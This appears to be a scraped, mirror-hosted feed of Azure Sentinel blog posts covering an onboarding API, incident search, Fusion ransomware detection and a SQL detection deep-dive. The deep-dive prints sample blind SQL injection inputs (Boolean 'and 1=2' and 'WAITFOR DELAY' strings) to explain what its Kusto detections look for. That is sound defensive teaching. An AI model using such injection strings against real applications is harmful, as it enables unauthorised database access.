<P>&nbsp;</P> Sun, 05 Sep 2021 22:44:45 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-ninja-training-knowledge-check/ba-p/2677696 Sarah_Young 2021-09-05T22:44:45Z What's new: Azure Sentinel new onboarding/offboarding API https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-new-onboarding-offboarding-api/ba-p/2640471 <H2 aria-level="1"><SPAN data-contrast="none">Introduction</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="none">Azure Sentinel is a nested resource on top of a Log Analytics workspace, which introduces some complexity in managing the Azure Sentinel resource on its own. Up until now, onboarding to Azure Sentinel required performing multiple API calls to multiple endpoints. When done by the UI the complexity is hidden from end user but for API users, this created complexities.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">To overcome this, we introduce a dedicated endpoint called “OnboardingStates”. This endpoint allows managing the Azure Sentinel instance seamlessly on a workspace through the API. The endpoint provides a single source of truth for performing the different operations required for a complete creation/deletion (aka onboarding/offboarding) of Azure Sentinel on a workspace. </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P aria-level="1">&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">How to use the new API</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">This new API, now in public preview, is documented in our preview API documentation:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/Azure/azure-rest-api-specs/blob/master/specification/securityinsights/resource-manager/Microsoft.SecurityInsights/preview/2021-03-01-preview/OnboardingStates.json</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Some examples&nbsp;on&nbsp;how to use this new API can be found here:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/Azure/azure-rest-api-specs/tree/master/specification/securityinsights/resource-manager/Microsoft.SecurityInsights/preview/2021-03-01-preview/examples/onboardingStates</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="1"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><SPAN data-contrast="none">Migration to the new model</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">During the public preview stage both the previous API method and the new API method will work seamlessly. No existing usage will be broken, and customers can expect all current flows to work as expected. The UI component itself has already been changed to use the new API call.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Once this API&nbsp;goes&nbsp;to general availability (GA), we will deprecate the current API. We will communicate beforehand to customers regularly using the old method, but&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">customers are expected to start using the new method no later than&nbsp;September 10</SPAN></STRONG><STRONG><SPAN data-contrast="auto">th</SPAN></STRONG><STRONG><SPAN data-contrast="auto">&nbsp;2021.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <H2><SPAN data-contrast="none">Note on the SecurityInsights solution </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="none">As part of onboarding to Azure Sentinel, the SecurityInsights solution is installed on the Log Analytics workspace. If you had the chance to manage your Azure Sentinel resource(s) using the API in the past, you might have manually installed/removed the&nbsp;SecurityInsights&nbsp;solution on/from the workspace. As part of introducing the new&nbsp;OnboardingStates&nbsp;API, this manual management of the solution will no longer be supported. Hence, you should neither install nor remove the&nbsp;SecurityInsights&nbsp;solution directly. Instead, either use the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Portal</SPAN></A><SPAN data-contrast="none"> or the&nbsp;OnboardingStates&nbsp;endpoints to manage Azure Sentinel on a workspace. </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">The statement above&nbsp;also applies to the current methods to install the&nbsp;SecurityInsights&nbsp;solution via ARM template&nbsp;(using&nbsp;</SPAN><I><SPAN data-contrast="none">Microsoft.OperationsManagement/solutions</SPAN></I><SPAN data-contrast="none">&nbsp;resource type)&nbsp;or PowerShell&nbsp;(using&nbsp;</SPAN><I><SPAN data-contrast="none">New-AzMonitorLogAnalyticsSolution</SPAN></I><SPAN data-contrast="none">&nbsp;cmdlet). The new&nbsp;OnboardingStates&nbsp;endpoint is already available to be used in ARM templates (see a sample&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">here</SPAN></A><SPAN data-contrast="none">)&nbsp;and&nbsp;we expect to add PowerShell support soon as part of&nbsp;the&nbsp;Az.SecurityInsights&nbsp;module.</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><SPAN data-contrast="none">Additional resources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Link to technical&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">documentation</SPAN></A><SPAN data-contrast="auto">&nbsp;- will be replaced by official API documentation once the feature becomes GA</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Currently there are still released&nbsp;tools and&nbsp;materials that use the old onboarding method. Over the next few weeks, and before the GA of the new method, we will update these as well to use the new method. These include&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Enable Azure Sentinel (microsoft.com)</SPAN><SPAN data-contrast="none">,</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-contrast="none">Sentinel2Go (</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part1-a-lab-w-prerecorded-data-amp-a-custom/ba-p/1260191" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel To-Go (Part1)</SPAN></A><SPAN data-contrast="none">)&nbsp;</SPAN><SPAN data-contrast="none">and&nbsp;Sentinel All-In-One (</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-all-in-one-accelerator/ba-p/1807933" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel All-In-One Accelerator - Microsoft Tech Community</SPAN></A><SPAN data-contrast="none">)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sample ARM template using th</SPAN><SPAN data-contrast="none">e new method.</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Mon, 16 Aug 2021 07:39:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-new-onboarding-offboarding-api/ba-p/2640471 Ely_Abramovitch 2021-08-16T07:39:18Z What's new: Incident advanced search is now public! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-incident-advanced-search-is-now-public/ba-p/2627590 <P><SPAN data-preserver-spaces="true">By default, incident searches run across the Incident ID, Title, Tags, Owner, and Product name values only. Now, with the new Advanced search pane, you can scroll down the list to select one or more other parameters to search on.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="liatlishaa_1-1628524992342.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301812i8C4805A2DE73333C/image-size/large?v=v2&amp;px=999" role="button" title="liatlishaa_1-1628524992342.png" alt="liatlishaa_1-1628524992342.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">The advanced fields list includes the following:</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">Alert ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert description</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert name</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert severity</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Analytic rule ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Bookmark ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Closing comment</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Comments</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Entities</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Incident description</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Reason for closing</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Tactics</SPAN></LI> </UL> <P> </P> <P><SPAN data-preserver-spaces="true">We recommend utilizing the Column Selector feature to support the search experience and add the searched columns to the grid view.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="liatlishaa_0-1628524948714.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301811i7DFB40FEE1ECA9B6/image-size/large?v=v2&amp;px=999" role="button" title="liatlishaa_0-1628524948714.png" alt="liatlishaa_0-1628524948714.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">The new UI allows for search by additional incident attributes and across all incidents in your workspace in seconds.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">You can find more information about the new feature in our <A href="#" target="_self">documentation</A>.</SPAN></P> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you triage and manage security incidents. If you have any feedback – about the experience, the usage – or anything else, please let us know.&nbsp;</P> <P>&nbsp;</P> Tue, 10 Aug 2021 09:04:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-incident-advanced-search-is-now-public/ba-p/2627590 liatlishaa 2021-08-10T09:04:22Z What’s new: Fusion Detection for Ransomware https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-fusion-detection-for-ransomware/ba-p/2621373 <P>In collaboration with the Microsoft Threat Intelligence Center (MSTIC), we are excited to announce <STRONG>Fusion detection for ransomware </STRONG>is now publicly available!</P> <P>&nbsp;</P> <P>These Fusion detections correlate alerts that are potentially associated with ransomware activities that are observed at defense evasion and execution stages during a specific timeframe. Once such ransomware activities are detected&nbsp;and correlated by the Fusion machine learning model, a high severity incident titled “Multiple alerts possibly related to Ransomware activity detected” will be triggered in your Azure Sentinel workspace.</P> <P>&nbsp;</P> <P>In order to help your analyst quickly understand the possible attack, Fusion provides you with a complete picture for the suspicious activities happened on the same device/host by correlating signals from Microsoft products as well as signals in network and cloud. Supported data connectors include:</P> <UL> <LI><A href="#" target="_self" data-linktype="relative-path">Azure Defender (Azure Security Center)</A></LI> <LI><A href="#" target="_self" data-linktype="relative-path">Microsoft Defender for Endpoint</A></LI> <LI><A href="#" target="_self" data-linktype="relative-path">Microsoft Defender for Identity</A></LI> <LI><A href="#" data-linktype="relative-path" target="_blank">Microsoft Cloud App Security</A></LI> <LI><A href="#" data-linktype="relative-path" target="_blank">Azure Sentinel scheduled analytics rules</A>. Fusion only considers scheduled analytics rules with tactics information.</LI> </UL> <P>&nbsp;</P> <P>The screenshot below shows a Fusion incident with 22 alerts. It correlates low severity signals that were detected around the same timeframe from the network and the host to show a possible ransomware attack and the different techniques used by attackers.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_0-1628272619612.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301131iDDDE4691ECA56D8F/image-size/large?v=v2&amp;px=999" role="button" title="Sylvie_Liu_0-1628272619612.png" alt="Sylvie_Liu_0-1628272619612.png" /></span></P> <P>&nbsp;</P> <P><EM>&nbsp;</EM></P> <P>For more information, see&nbsp;<A href="#" target="_blank" rel="noopener">Multiple alerts possibly related to Ransomware activity detected</A>.</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>Why Fusion detection for ransomware?</STRONG></H2> <P data-unlink="true">Ransomware attack is a type of attack that involves using specific types of malicious software or malware to make network or system inaccessible for the purpose of extortion – ‘ransom’. There is no doubt that ransomware attacks have taken a massive turn in being the top priority as a threat to many organizations. A <A href="#" target="_self">recent report&nbsp;<SPAN>released by </SPAN>PurpleSec</A> revealed that the estimated cost of ransomware attacks was $20 billion in 2020 and with downtime increasing by over 200% and the cost being 23x higher than 2019.</P> <P>&nbsp;</P> <P>Preventing such attacks in the first place would be the ideal solution but with the new trend of ‘ransomware as a service’ and human operated ransomware, the scope and the sophistication of attacks are increasing – attackers are using slow and stealth techniques to compromise network, which makes it harder to detect them in the first place.</P> <P>&nbsp;</P> <P><STRONG>With Fusion detection for ransomware that captures malicious activities at the defense evasion and execution stages of an attack, it gives security analysts an opportunity to quickly understand the suspicious activities happened around the same timeframe on the common entities, connect the dots and take immediate actions to disrupt the attack.</STRONG> When it comes to ransomware attacks, time more than anything else is the most important factor in preventing more machines or the entire network from getting compromised. The sooner such alerts are raised to security analysts with the details on various attacker activities, the faster the ransomware attacks can be contained and remediated. A detection like this will help analysts by giving the compilation of attacker activity around execution stage helping reduce MTTD (Mean Time to Detect) and MTTR (Mean Time to Respond).</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>Examples of the Fusion detection for ransomware</STRONG></H2> <P>In the <EM>Incident 1</EM> example, Fusion correlates alerts triggered within a short timeframe on the same device, indicating a possible chain of attacks from how the attackers got in through possible RDP brute-force attack, followed by the use of a ‘Cryptor’ malware and potential phishing activities using malicious document associated with the EUROPIUM activity group, to the detection of Petya and WannaCrypt ransomware in the network.</P> <P>&nbsp;</P> <P><EM><STRONG>Incident 1</STRONG></EM></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_3-1628273507782.png" style="width: 535px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301136i24E84DB4CE968D39/image-dimensions/535x335?v=v2" width="535" height="335" role="button" title="Sylvie_Liu_3-1628273507782.png" alt="Sylvie_Liu_3-1628273507782.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>Incident 2</EM> below is another example of the Fusion ransomware detection that was confirmed as true positive. This incident correlates alerts showing ransomware activities at defense evasion and execution stages on the same host, along with additional suspicious activities detected during the same timeframe to show you possible techniques used by attackers to compromise the host.</P> <P>&nbsp;</P> <P><EM><STRONG>Incident 2</STRONG></EM></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_0-1628273956261.png" style="width: 535px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301137iFF18B4F1D2B6102D/image-dimensions/535x428?v=v2" width="535" height="428" role="button" title="Sylvie_Liu_0-1628273956261.png" alt="Sylvie_Liu_0-1628273956261.png" /></span></P> <P>&nbsp;</P> <P>In these Fusion incidents, the alerts related to ransomware/malware detection might indicate that the ransomware/malware was stopped from delivering its payload but it is prudent to check the machine for signs of infection. Attackers may continue malicious activities after ransomware was prevented – it is also important that you investigate the entire network to understand the intrusion and identify other machines that might be impacted by this attack.</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>What’s next after receiving the Fusion detection?</STRONG></H2> <P>After receiving Fusion detentions for possible ransomware activities, we recommend you to check with the machine owner if this is intended behavior. If the activity is unexpected, treat the machine as potentially compromised and take immediate actions to analyze different techniques used by attackers to compromise the host and to evade detection in this potential ransomware attack. Here are the recommended steps:</P> <P>&nbsp;</P> <OL> <LI>Isolate the machine from the network to prevent potential lateral movement.</LI> <LI>Run a full antimalware scan on the machine, following any resulting remediation advice.</LI> <LI>Review installed / running software on the machine, removing any unknown or unwanted packages.</LI> <LI>Revert the machine to a known good state, reinstalling operating system only if required and restoring software from a verified malware-free source.</LI> <LI>Resolve to recommendations from alert providers (e.g. <A href="#" target="_blank" rel="noopener">Azure Security Center</A> and <A href="#" target="_blank" rel="noopener">Microsoft Defender</A>) to prevent future breaches.</LI> <LI>Investigate the entire network to understand the intrusion and identify other machines that might be impacted by this attack.</LI> </OL> <P>&nbsp;</P> <P>As you investigate and close the Fusion incidents, <STRONG>we encourage you to provide feedback on whether this incident was a True Positive, Benign Positive, or a False Positive, along with details in the comments.</STRONG> Your feedback is critical to help Microsoft deliver the highest quality detections!</P> <P>&nbsp;</P> <P>We will continue to release new multistage attack scenarios detected by Fusion in Azure Sentinel, keep an eye on our <A href="#" target="_blank" rel="noopener">Azure Sentinel Fusion</A> page for updates!</P> <P>&nbsp;</P> <P>Relevant readings:</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Fusion</A></LI> <LI><A href="#" target="_blank" rel="noopener">The growing threat of ransomware</A></LI> <LI><A href="#" target="_blank" rel="noopener">Rapidly protect against ransomware and extortion</A></LI> <LI><A href="#" target="_blank" rel="noopener">Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk</A></LI> </UL> <P>&nbsp;</P> Mon, 09 Aug 2021 18:35:01 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-fusion-detection-for-ransomware/ba-p/2621373 Sylvie_Liu 2021-08-09T18:35:01Z Azure Sentinel SQL Solution Query Deep-Dive https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sql-solution-query-deep-dive/ba-p/2597961 <P><EM>by <LI-USER uid="686380"></LI-USER>&nbsp;&amp; Andrey Karpovsky<BR />Thanks to: Tamer Salman, Moshe Israel,&nbsp;Hani Neuvirth-Telem &amp; Yoav Daniely</EM></P> <P>&nbsp;</P> <P>In May 2021 <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Azure Sentinel saw the launch</A> of <A href="#" target="_blank" rel="noopener">Azure Sentinel Solutions</A> into public preview. This launch provided Azure Sentinel preview customers with access to over 32 solutions spanning Microsoft and other vendor data sources.</P> <P>&nbsp;</P> <P>As part of this release Azure Defender and Microsoft Threat Intelligence Center (MSTIC) collaborated to contribute Detections and Hunting queries to the Azure Sentinel for Azure SQL solution. These detection and hunting queries are based on real world attack scenarios and provide a basis for detecting and investigating potential SQL exploitation attacks.</P> <P>&nbsp;</P> <P>In this tech community post we will cover each of the Detection and Hunting queries included in the Azure Sentinel SQL solution. This post will cover what malicious activity these queries are designed to uncover, how to tailor them for your environment using their configurable parameters and provide some insight into how the query works.</P> <P>&nbsp;</P> <P>Whilst the detection and hunting queries discussed in this Tech Community post will focus on Azure SQL, many of the techniques can be adapted to work with any relational database management system (RDMS).</P> <P>&nbsp;</P> <P>More information on where to find Solutions within Azure Sentinel can <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">be found here</A>. Within the solutions tab search for “Azure Sentinel for Azure SQL” to install the SQL solution.</P> <P>&nbsp;</P> <H2>Common SQL Anomalies Indicating Compromise</H2> <P>For those unfamiliar with potentially malicious SQL activity, this section will briefly cover the different types of unusual activity that the detection and hunting queries are designed to detect. If you are already familiar with malicious SQL activity you may wish to skip straight to the queries.</P> <P>&nbsp;</P> <H3>Unsecured Databases</H3> <P>Databases that are improperly secured and exposed to the open internet will almost certainly see exploitation attempts. The MSTIC sensor network is a collection of deception services&nbsp;that collect data on active internet exploitation. In 2020 the MSTIC sensor network observed over 300,000 SQL code execution attempts targeted at our honeypot network. These were attempts where an SQL query was sent to the server with the intent of executing an unauthorised command.</P> <P>&nbsp;</P> <P>Unpatched vulnerable server software, weak passwords, and exposed administrative interfaces are all common vectors for attackers conducting mass scanning and exploitation operations.</P> <P>&nbsp;</P> <P>Azure hosted SQL servers benefit from some default protections. New SQL servers will be firewalled from the open internet and can only communicate with other Azure services. Firewall settings in Azure allow you to configure your server to only allow connections from specific IP addresses or ranges.</P> <P>&nbsp;</P> <H3>SQL Injection</H3> <P>SQLi is a code injection technique where an attacker sends crafted query statements to an SQL server, these statements are crafted to exploit poorly implemented program logic. If successful commands sent by the attacker may allow data to be extracted from the database, existing records to be modified or new records created.</P> <P>&nbsp;</P> <P>SQL injection vulnerabilities are introduced when user-controllable input is improperly sanitised, or input sanitisation is circumvented by the attacker. SQL injection vulnerabilities may be found in any application that interacts with an SQL server, most commonly these are web applications.</P> <P>&nbsp;</P> <P>As the vulnerable application processes and executes the command on behalf of the attacker, any commands that are injected successfully into a web application are executed from the IP address where the vulnerable application is hosted. Successful SQLi can be used to bypass IP restrictions enforced using Firewalls and make attacks harder to investigate.</P> <P>&nbsp;</P> <P>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="sql_attacker.jpg" style="width: 623px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299871i59E82DE9FE15FAC5/image-dimensions/623x169?v=v2" width="623" height="169" role="button" title="sql_attacker.jpg" alt="Threat actor injects SQL code into a vulnerable page, providing access to the underlying SQL database." /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Threat actor injects SQL code into a vulnerable page, providing access to the underlying SQL database.</span></span></P> <P>&nbsp;</P> <P>SQLi can be performed with or without knowledge of the underlying database structure, when queries are sent to the server without knowledge of the underlying database structure these are commonly referred to as being “blind”. Blind SQLi is generally used to determine if the application is vulnerable, the two most common techniques are Boolean based and Timing based blind SQL injection attacks.</P> <P>&nbsp;</P> <H4>Boolean based Blind SQLi</H4> <P>Boolean based blind SQLi is a reconnaissance technique which uses Boolean statements, returning a True or False result, to determine if the code is being executed by the SQL server after injection into a vulnerable parameter. The attacker will view the page using standard parameters and then inject code to force a true or false result. They will then look for differences in the returned result to determine if their injection was successful.</P> <P>&nbsp;</P> <P>In the below example, the attacker may inject some SQL into the “id” parameter of the members page, in the first instance providing and statement that will return a false:</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1 and 1=2</LI-CODE> <P>&nbsp;</P> <P>This will cause the page to believe that the member ID requested doesn’t exist. While the member with an ID of 1 exists the second part of the statement will return false. The attacker will then inject SQL that will return a true:</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1 and 1=1</LI-CODE> <P>&nbsp;</P> <P>By looking for differences in the response the attacker can determine the page is vulnerable. In the example above, when the first request is sent the page returns an error stating the member was not found. In the second request the attacker forces a true result, and therefore the page returns a successful lookup. If the attacker’s injection were not working, or the injected SQL was being filtered out, the page would behave normally, returning member information for member ID 1 in both instances.</P> <P>&nbsp;</P> <H4>Time-based blind SQLi</H4> <P>Time based blind SQL injection uses SQL sleep functions to force the query to wait for a pre-determined amount of time. Like with Boolean blind SQL injection it relies on the attacker first baselining the vulnerable pages behaviour and then injecting crafted requests to force unusual execution times.</P> <P>&nbsp;</P> <P>An attacker may visit the page with normal parameters, and note that the base executes in 88 milliseconds.</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1</LI-CODE> <P>&nbsp;</P> <P>The attacker may then append the SQL Server WAITFOR DELAY command, forcing the query to wait for 5 seconds if executed.</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1; WAITFOR DELAY '00:00:05'</LI-CODE> <P>&nbsp;</P> <P>The attacker will know if the injection is successful if the page which previous took 88 milliseconds to execute now takes over 5 seconds to execute.</P> <P>&nbsp;</P> <P>This technique can be detected by analysing logs or web requests for the presence of WAITFOR commands, however there are many techniques to obfuscate the injected command, allowing the attacker to bypass static keyword detection.</P> <P>&nbsp;</P> <H3>Data Extraction &amp; Manipulation</H3> <P>The end goal for most attackers targeting SQL servers is to extract data or delete/damage that data. SQL databases often contain sensitive information that can be attractive to both criminal or nation-state actors. Extraction of sensitive user information may provide a nation-state threat group with information to further exploit the network or may be of intelligence value alone. Organised crime groups may seek to sell the data onwards or encrypted/destroy the data as part of a ransomware campaign.</P> <P>&nbsp;</P> <H2>Detection Queries</H2> <P>This section will cover detection queries in detail. These are queries that are designed to be used as alerts on potential malicious attempts to access and exploit the resources. Detection queries expose several parameters that can be easily tuned to control the accuracy and quantity of detections. Detections look for suspicious events inside recent time window, which are anomalous based on behavior that was learned in the preceding training window. In addition, these queries can be used as templates for other security scenarios.</P> <P>&nbsp;</P> <P>Each detection query is built on top of a standard normalisation, using the following Kusto query to process SQL log data. For brevity, each individual query will not include this normalisation step. &nbsp;Complete queries can be found within the Azure Sentinel SQL solution.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let timeSliceSize = 1h; let timeRange = 14d; let processedData = materialize ( AzureDiagnostics | where TimeGenerated &gt; ago(timeRange) | where Category == 'SQLSecurityAuditEvents' and action_id_s has_any ("RCM", "BCM") // Keep only SQL affected rows | project TimeGenerated, PrincipalName = server_principal_name_s , ClientIp = client_ip_s, HostName = host_name_s, ResourceId , ApplicationName = application_name_s, ActionName = action_name_s , Database = strcat(LogicalServerName_s, '/', database_name_s) , IsSuccess = succeeded_s, DurationMs = duration_milliseconds_d , AffectedRows = affected_rows_d,ResponseRows = response_rows_d , Statement = statement_s , Error = case( additional_information_s has 'error_code', toint(extract("&lt;error_code&gt;([0-9.]+)", 1, additional_information_s)) , additional_information_s has 'failure_reason', toint(extract("&lt;failure_reason&gt;Err ([0-9.]+)", 1, additional_information_s)) , 0) , State = case( additional_information_s has 'error_state', toint(extract("&lt;error_state&gt;([0-9.]+)", 1, additional_information_s)) , additional_information_s has 'failure_reason', toint(extract("&lt;failure_reason&gt;Err ([0-9.]+), Level ([0-9.]+)", 2, additional_information_s)) , 0), AdditionalInfo = additional_information_s, timeSlice = floor(TimeGenerated, timeSliceSize)) | extend RowNumber = row_number(), WindowType = case( TimeGenerated &gt;= ago(detectionWindow), 'detection', (ago(trainingWindow) &lt;= TimeGenerated and TimeGenerated &lt; ago(detectionWindow)), 'training', 'other') ;</LI-CODE> <P>&nbsp;</P> <P>Detection queries can be divided into 3 broad categories by similar logic and content.</P> <P>&nbsp;</P> <H3>Detections for volumetric spikes</H3> <P>These detections monitor a single numeric variable and look for significant upward spikes, that are anomalous when compared to normal behaviour of the same variable on that resource in the training period. For example, if a malicious actor attempts to extract all the records in a database, it will be detected.</P> <P>&nbsp;</P> <P>Currently 2 detections of these types are included, looking for different numeric columns (and security scenarios):</P> <OL> <LI><STRONG>VolumeAffectedRowsStatefulAnomalyOnDatabase</STRONG>: Monitors the ‘AffectedRows’ metric, which reflects changes made in the database. Upward spikes indicate that too many data rows were changed, which might indicate potential attempts to destroy data or make it temporary unusable.</LI> <LI><STRONG>VolumeResponseRowsStatefulAnomalyOnDatabase</STRONG>: Monitors the ’ResponseRows’ metric, that reflects exfiltration from the database. Spikes indicate that too many data rows were extracted, which might indicate potential data theft.</LI> </OL> <P>&nbsp;</P> <P>The queries share several parameters that control the query logic and are exposed for easy control.</P> 